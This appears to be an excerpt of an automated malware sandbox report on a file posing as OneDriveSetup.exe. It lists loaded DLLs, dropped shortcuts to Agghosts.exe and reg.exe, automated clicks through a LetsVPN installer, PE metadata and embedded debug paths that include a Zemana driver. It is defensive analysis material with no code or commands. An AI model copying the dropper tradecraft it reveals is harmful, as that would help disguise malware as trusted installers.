                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\OneDriveSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: dick.lnk.0.drLNK file: ..\..\Users\Public\Music\20250413054815\Agghosts.exe
                Source: 2.lnk.0.drLNK file: ..\..\Windows\System32\reg.exe
                Source: C:\Users\Public\Videos\bin.exeAutomated click: Next >
                Source: C:\Users\Public\Videos\bin.exeAutomated click: I Agree
                Source: C:\Users\Public\Videos\bin.exeAutomated click: Install
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\Public\Videos\bin.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: OneDriveSetup.exeStatic PE information: More than 263 > 100 exports found
                Source: OneDriveSetup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: OneDriveSetup.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: OneDriveSetup.exeStatic file information: File size 83625512 > 1048576
                Source: OneDriveSetup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x34ac00
                Source: OneDriveSetup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x116e00
                Source: OneDriveSetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x4b17c00
                Source: OneDriveSetup.exeStatic PE information: More than 200 imports for KERNEL32.dll
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: OneDriveSetup.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: OneDriveSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1580441083.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: bin.exe, 00000017.00000003.1592925390.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: bin.exe, 00000017.00000003.1602872671.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: bin.exe, 00000017.00000003.1644108290.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: bin.exe, 00000017.00000003.1590499522.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: bin.exe, 00000017.00000003.1573517122.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: bin.exe, 00000017.00000003.1563813058.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: bin.exe, 00000017.00000003.1578661001.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1663031979.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: bin.exe, 00000017.00000003.1577950171.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: bin.exe, 00000017.00000003.1504688065.0000000002735000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1831133678.000002335EBD9000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1829045886.000002335EB1C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: bin.exe, 00000017.00000003.1563142102.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: bin.exe, 00000017.00000003.1559734523.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: bin.exe, 00000017.00000003.1572181995.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: bin.exe, 00000017.00000003.1587357502.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: bin.exe, 00000017.00000003.1526409476.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.IdentityModel.pdb source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb}> source: bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb. source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Z:\Zemana\Projects\AntiMalware\bin\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1606248215.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: bin.exe, 00000017.00000003.1561174473.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: bin.exe, 00000017.00000003.1600632610.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: bin.exe, 00000017.00000003.1553314105.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
